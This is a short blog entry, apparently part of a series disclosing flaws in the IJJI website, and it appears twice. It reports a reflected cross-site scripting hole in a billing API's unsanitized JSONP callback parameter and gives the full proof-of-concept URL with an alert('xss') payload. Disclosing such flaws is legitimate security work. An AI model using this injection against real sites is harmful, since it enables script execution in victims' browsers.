Type: Non-persistent
Criteria: None
http://billing.ijji.com/api/coin.nhn?m=coinBal&callback=alert(%27xss%27);//
Another unsanitized callback variable. See other JSON posts for my suggestions.
Advertisement
An attempt to publish the vulnerabilities in the IJJI website
Type: Non-persistent
Criteria: None
http://billing.ijji.com/api/coin.nhn?m=coinBal&callback=alert(%27xss%27);//
Another unsanitized callback variable. See other JSON posts for my suggestions.